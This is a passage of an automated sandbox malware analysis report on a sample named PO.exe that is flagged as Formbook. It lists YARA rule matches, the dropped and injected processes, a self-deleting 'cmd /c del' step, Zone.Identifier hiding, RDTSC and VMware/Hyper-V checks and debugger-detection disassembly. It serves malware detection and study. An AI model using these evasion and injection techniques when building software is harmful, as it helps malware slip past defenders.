          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: String function: 01B3B150 appears 72 times
          Source: PO.exe, Binary or memory string: OriginalFilename vs PO.exe
          Source: PO.exe, 00000000.00000003.736056198.00000000067E6000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameAddInProcess32.exeT vs PO.exe
          Source: PO.exe, 00000000.00000002.762771390.00000000063C0000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenamemscorrc.dllT vs PO.exe
          Source: PO.exe, 00000000.00000002.753647358.0000000002B31000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameRunPe6.dll" vs PO.exe
          Source: PO.exe, 00000000.00000002.763604937.00000000066C0000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameSHCore1.dll0 vs PO.exe
          Source: PO.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.793241716.0000000001550000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.793241716.0000000001550000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.760068080.0000000003C10000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.760068080.0000000003C10000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.909160222.0000000000330000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.909160222.0000000000330000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.793449385.00000000018D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.793449385.00000000018D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.759556718.0000000003B47000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.759556718.0000000003B47000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.759427914.0000000003AFC000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.759427914.0000000003AFC000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine Classification label: mal100.troj.evad.winEXE@7/2@7/5
          Source: C:\Users\user\Desktop\PO.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO.exe.log
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7080:120:WilError_01
          Source: C:\Users\user\Desktop\PO.exe File created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: PO.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PO.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\PO.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Users\user\Desktop\PO.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: PO.exe Virustotal: Detection: 39%
          Source: PO.exe ReversingLabs: Detection: 27%
          Source: unknown Process created: C:\Users\user\Desktop\PO.exe 'C:\Users\user\Desktop\PO.exe'
          Source: C:\Users\user\Desktop\PO.exe Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: C:\Windows\SysWOW64\wlanext.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PO.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: PO.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: PO.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: AddInProcess32.pdb source: PO.exe, 00000000.00000003.736056198.00000000067E6000.00000004.00000001.sdmp, AddInProcess32.exe, wlanext.exe, 00000011.00000002.909296920.00000000003BD000.00000004.00000020.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000F.00000000.770264469.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 0000000B.00000002.793729525.0000000001C2F000.00000040.00000001.sdmp, wlanext.exe, 00000011.00000002.910088572.0000000002D30000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: AddInProcess32.exe, 0000000B.00000002.793498300.0000000001900000.00000040.00000001.sdmp
          Source: Binary string: AddInProcess32.pdbpw source: PO.exe, 00000000.00000003.736056198.00000000067E6000.00000004.00000001.sdmp, AddInProcess32.exe, 0000000B.00000002.792851636.0000000000FF2000.00000002.00020000.sdmp, wlanext.exe, 00000011.00000002.909296920.00000000003BD000.00000004.00000020.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: wlanext.pdbGCTL source: AddInProcess32.exe, 0000000B.00000002.793498300.0000000001900000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000F.00000000.770264469.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 11_2_00405915 push esi; iretd 11_2_00405918
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 11_2_0040C2BE pushfd ; ret 11_2_0040C2BF
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 11_2_0041B3C5 push eax; ret 11_2_0041B418
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 11_2_0041B47C push eax; ret 11_2_0041B482
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 11_2_0041B412 push eax; ret 11_2_0041B418
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 11_2_0041B41B push eax; ret 11_2_0041B482
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 11_2_0041555D push ss; ret 11_2_0041555E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 11_2_01B8D0D1 push ecx; ret 11_2_01B8D0E4
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02DAD0D1 push ecx; ret 17_2_02DAD0E4
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0283C2BE pushfd ; ret 17_2_0283C2BF
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0284B3C5 push eax; ret 17_2_0284B418
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02835915 push esi; iretd 17_2_02835918
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0284CC92 pushfd ; iretd 17_2_0284CC93
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0284B412 push eax; ret 17_2_0284B418
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0284B41B push eax; ret 17_2_0284B482
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0284B47C push eax; ret 17_2_0284B482
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0284555D push ss; ret 17_2_0284555E

          Hooking and other Techniques for Hiding and Protection:

          Hides that the sample has been downloaded from the Internet (zone.identifier)
          Source: C:\Users\user\Desktop\PO.exe File opened: C:\Users\user\Desktop\PO.exe\:Zone.Identifier read attributes | delete
          Source: C:\Users\user\Desktop\PO.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exe RDTSC instruction interceptor: First address: 00000000028385F4 second address: 00000000028385FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exe RDTSC instruction interceptor: First address: 000000000283898E second address: 0000000002838994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 11_2_004088C0 rdtsc 11_2_004088C0
          Source: C:\Users\user\Desktop\PO.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\PO.exe Window / User API: threadDelayed 431
          Source: C:\Users\user\Desktop\PO.exe Window / User API: threadDelayed 9349
          Source: C:\Users\user\Desktop\PO.exe TID: 7032 Thread sleep time: -12912720851596678s >= -30000s
          Source: C:\Users\user\Desktop\PO.exe TID: 7092 Thread sleep count: 431 > 30
          Source: C:\Users\user\Desktop\PO.exe TID: 7092 Thread sleep count: 9349 > 30
          Source: C:\Users\user\Desktop\PO.exe TID: 7032 Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 352 Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\wlanext.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\PO.exe Thread delayed: delay time: 30000
          Source: explorer.exe, 0000000F.00000000.774873879.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000F.00000000.770052583.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 0000000F.00000000.770654125.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000F.00000002.917614118.0000000004755000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 0000000F.00000000.775024682.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 0000000F.00000000.770052583.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 0000000F.00000000.770052583.00000000058C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 0000000F.00000000.775024682.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: PO.exe, 00000000.00000002.752842533.0000000000C41000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: explorer.exe, 0000000F.00000000.770052583.00000000058C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\PO.exe Process information queried: ProcessInformation
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\wlanext.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\PO.exe Code function: 0_2_05AC25B0 LdrInitializeThunk, 0_2_05AC25B0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B63B7A mov eax, dword ptr fs:[00000030h]11_2_01B63B7A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B3DB60 mov ecx, dword ptr fs:[00000030h]11_2_01B3DB60
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B3F358 mov eax, dword ptr fs:[00000030h]11_2_01B3F358
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B3DB40 mov eax, dword ptr fs:[00000030h]11_2_01B3DB40
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B4AAB0 mov eax, dword ptr fs:[00000030h]11_2_01B4AAB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B4AAB0 mov eax, dword ptr fs:[00000030h]11_2_01B4AAB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B6FAB0 mov eax, dword ptr fs:[00000030h]11_2_01B6FAB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B352A5 mov eax, dword ptr fs:[00000030h]11_2_01B352A5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B352A5 mov eax, dword ptr fs:[00000030h]11_2_01B352A5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B352A5 mov eax, dword ptr fs:[00000030h]11_2_01B352A5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B352A5 mov eax, dword ptr fs:[00000030h]11_2_01B352A5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B352A5 mov eax, dword ptr fs:[00000030h]11_2_01B352A5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B6D294 mov eax, dword ptr fs:[00000030h]11_2_01B6D294
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B6D294 mov eax, dword ptr fs:[00000030h]11_2_01B6D294
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B62AE4 mov eax, dword ptr fs:[00000030h]11_2_01B62AE4
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B62ACB mov eax, dword ptr fs:[00000030h]11_2_01B62ACB
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B74A2C mov eax, dword ptr fs:[00000030h]11_2_01B74A2C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B74A2C mov eax, dword ptr fs:[00000030h]11_2_01B74A2C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B5A229 mov eax, dword ptr fs:[00000030h]11_2_01B5A229
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B5A229 mov eax, dword ptr fs:[00000030h]11_2_01B5A229
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B5A229 mov eax, dword ptr fs:[00000030h]11_2_01B5A229
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B5A229 mov eax, dword ptr fs:[00000030h]11_2_01B5A229
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B5A229 mov eax, dword ptr fs:[00000030h]11_2_01B5A229
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B5A229 mov eax, dword ptr fs:[00000030h]11_2_01B5A229
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B5A229 mov eax, dword ptr fs:[00000030h]11_2_01B5A229
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B5A229 mov eax, dword ptr fs:[00000030h]11_2_01B5A229
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B5A229 mov eax, dword ptr fs:[00000030h]11_2_01B5A229
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01C08A62 mov eax, dword ptr fs:[00000030h]11_2_01C08A62
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B35210 mov eax, dword ptr fs:[00000030h]11_2_01B35210
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B35210 mov ecx, dword ptr fs:[00000030h]11_2_01B35210
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B35210 mov eax, dword ptr fs:[00000030h]11_2_01B35210
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B35210 mov eax, dword ptr fs:[00000030h]11_2_01B35210
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B3AA16 mov eax, dword ptr fs:[00000030h]11_2_01B3AA16
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B3AA16 mov eax, dword ptr fs:[00000030h]11_2_01B3AA16
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B53A1C mov eax, dword ptr fs:[00000030h]11_2_01B53A1C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BFAA16 mov eax, dword ptr fs:[00000030h]11_2_01BFAA16
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BFAA16 mov eax, dword ptr fs:[00000030h]11_2_01BFAA16
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B48A0A mov eax, dword ptr fs:[00000030h]11_2_01B48A0A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B7927A mov eax, dword ptr fs:[00000030h]11_2_01B7927A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BEB260 mov eax, dword ptr fs:[00000030h]11_2_01BEB260
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BEB260 mov eax, dword ptr fs:[00000030h]11_2_01BEB260
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BFEA55 mov eax, dword ptr fs:[00000030h]11_2_01BFEA55
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BC4257 mov eax, dword ptr fs:[00000030h]11_2_01BC4257
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B39240 mov eax, dword ptr fs:[00000030h]11_2_01B39240
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B39240 mov eax, dword ptr fs:[00000030h]11_2_01B39240
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B39240 mov eax, dword ptr fs:[00000030h]11_2_01B39240
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B39240 mov eax, dword ptr fs:[00000030h]11_2_01B39240
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B61DB5 mov eax, dword ptr fs:[00000030h]11_2_01B61DB5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B61DB5 mov eax, dword ptr fs:[00000030h]11_2_01B61DB5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B61DB5 mov eax, dword ptr fs:[00000030h]11_2_01B61DB5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B635A1 mov eax, dword ptr fs:[00000030h]11_2_01B635A1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B6FD9B mov eax, dword ptr fs:[00000030h]11_2_01B6FD9B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B6FD9B mov eax, dword ptr fs:[00000030h]11_2_01B6FD9B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B62581 mov eax, dword ptr fs:[00000030h]11_2_01B62581
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B62581 mov eax, dword ptr fs:[00000030h]11_2_01B62581
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B62581 mov eax, dword ptr fs:[00000030h]11_2_01B62581
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B62581 mov eax, dword ptr fs:[00000030h]11_2_01B62581
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B32D8A mov eax, dword ptr fs:[00000030h]11_2_01B32D8A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B32D8A mov eax, dword ptr fs:[00000030h]11_2_01B32D8A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B32D8A mov eax, dword ptr fs:[00000030h]11_2_01B32D8A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B32D8A mov eax, dword ptr fs:[00000030h]11_2_01B32D8A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B32D8A mov eax, dword ptr fs:[00000030h]11_2_01B32D8A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BE8DF1 mov eax, dword ptr fs:[00000030h]11_2_01BE8DF1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B4D5E0 mov eax, dword ptr fs:[00000030h]11_2_01B4D5E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01B4D5E0 mov eax, dword ptr fs:[00000030h]11_2_01B4D5E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BFFDE2 mov eax, dword ptr fs:[00000030h]11_2_01BFFDE2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BFFDE2 mov eax, dword ptr fs:[00000030h]11_2_01BFFDE2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BFFDE2 mov eax, dword ptr fs:[00000030h]11_2_01BFFDE2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BFFDE2 mov eax, dword ptr fs:[00000030h]11_2_01BFFDE2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01C005AC mov eax, dword ptr fs:[00000030h]11_2_01C005AC
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01C005AC mov eax, dword ptr fs:[00000030h]11_2_01C005AC
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BB6DC9 mov eax, dword ptr fs:[00000030h]11_2_01BB6DC9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BB6DC9 mov eax, dword ptr fs:[00000030h]11_2_01BB6DC9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BB6DC9 mov eax, dword ptr fs:[00000030h]11_2_01BB6DC9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01BB6DC9 mov ecx, dword ptr fs:[00000030h]11_2_01BB6DC9
